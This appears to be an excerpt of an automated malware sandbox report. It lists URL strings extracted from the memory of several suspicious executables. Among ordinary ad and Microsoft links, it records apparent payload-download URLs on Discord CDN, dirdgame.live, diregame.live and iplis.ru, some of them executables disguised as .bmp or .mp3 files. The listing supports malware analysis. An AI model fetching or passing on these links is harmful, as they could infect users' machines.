      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: https://blockchain.infoindex
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/-C
      Source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/835840016650600461/835848109048987689/004
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753170686.0000000004F04000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753170686.0000000004F04000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exe9
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exeC:
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exeLMEM
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exeVD
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe%2LMEM
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe02uI#
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exeY
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exeam
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exer
      Source: yevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.753660933.0000000005B38000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe.
      Source: yevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe2
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeC
      Source: yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeJ
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeL
      Source: yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exet
      Source: yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exex
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmp
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpC
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpC:
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpLMEM
      Source: yevbZfdCqR.exe, 00000001.00000002.753170686.0000000004F04000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpk
      Source: yevbZfdCqR.exe, 00000001.00000002.753170686.0000000004F04000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856207959917985862/file3s.bmpl
      Source: yevbZfdCqR.exe, 00000001.00000003.658455877.0000000005B37000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.657251202.0000000005B33000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmp
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpC
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpC:
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpLMEM
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpN
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpS
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpeerqD$
      Source: Browzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpnt=1LMEM
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/856079061931786250/856079337548021790/app.bmpxeH
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/ones
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/ttachments/849802777433341954/849807598056112138/Setup2.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/ttachments/855697945679888404/856207959917985862/file3s.bmptoolspab2.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/849807598056112138/Setup2.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/851833670733266955/jooyu.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/851833670733266955/jooyu.exeE
      Source: yevbZfdCqR.exe, 00000001.00000002.753162388.0000000004F00000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.e
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmp4
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856835788548603904/file3.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856835788548603904/file3.bmpD#
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/855697945679888404/856835788548603904/file3.bmpq
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/856079061931786250/856079337548021790/app.bmp
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com:80/attachments/856079061931786250/856079337548021790/app.bmpd
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://wP
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.943050951.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1eLMEM
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.943050951.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1eLMEM
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/%kS
      Source: Browzar.exe, 0000001D.00000003.736678674.00000000008D0000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feec
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feec/?v=2000
      Source: Browzar.exe, 0000001D.00000003.736678674.00000000008D0000.00000004.00000001.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecC:
      Source: Browzar.exe, 0000001D.00000003.736411062.0000000005CAB000.00000004.00000001.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecD
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecV
      Source: Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecXo
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: https://cse.google.com/cse.js?cx=d33ee9b7555c1feecbygoogle.js
      Source: md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushers
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: https://d.dirdgame.live/
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753214699.0000000004F40000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exe
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exeLMEM
      Source: md8_8eus.exe, 00000023.00000003.950342573.0000000003FE0000.00000004.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF
      Source: md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/html/
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: https://humisnee.com/sb.phpincompatible
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
      Source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
      Source: yevbZfdCqR.exe, 00000001.00000002.753660933.0000000005B38000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753268870.0000000004F72000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.754193678.0000000005EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/1G8Fx7.mp3
      Source: yevbZfdCqR.exe, 00000001.00000002.754205295.0000000005EB7000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/1G8Fx7.mp3~
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.754193678.0000000005EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/1SBms7.mp3
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/J
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/W
      Source: yevbZfdCqR.exe, 00000001.00000002.753268870.0000000004F72000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru/n
      Source: yevbZfdCqR.exe, 00000001.00000002.753025081.0000000004E8A000.00000004.00000001.sdmpString found in binary or memory: https://iplis.ru:443/1G8Fx7.mp3i/getData.php
      Source: yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live/
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live/userf/2201/google-game.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live/userf/2201/google-game.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live/userf/2201/google-game.exedll
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live:80/
      Source: yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpString found in binary or memory: https://jom.diregame.live:80/m
      Source: yevbZfdCqR.exe, 00000001.00000002.749730612.0000000000F9B000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live:80/userf/2201/google-game.exei
      Source: yevbZfdCqR.exe, 00000001.00000002.749686234.0000000000F76000.00000004.00000020.sdmpString found in binary or memory: https://jom.diregame.live:80/userf/2201/google-game.exet
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
      Source: md8_8eus.exe, 00000023.00000003.956833511.0000000004018000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
      Source: md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: https://maps.windows.com/windows-app-web-link
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745782059.000000000176F000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpString found in binary or memory: https://messenger.com/
      Source: md8_8eus.exe, 00000023.00000003.921488026.0000000003E81000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
      Source: md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=285df6c9c501a160c7a24c
      Source: md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update1.xml?OneDriveUpdate=4a941ab240f8b2c5ca3ca1
      Source: md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=plmetrics
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/
      Source: Browzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
      Source: Browzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js#
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js.
      Source: Browzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.jsC:
      Source: Browzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.jsLLI
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/logging_library.js
      Source: Browzar.exe, 0000001D.00000003.736218551.0000000008CDC000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/managed/js/adsense/
      Source: Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
      Source: md8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
      Source: yevbZfdCqR.exe, 00000001.00000002.753660933.0000000005B38000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.930934433.0000000003E18000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
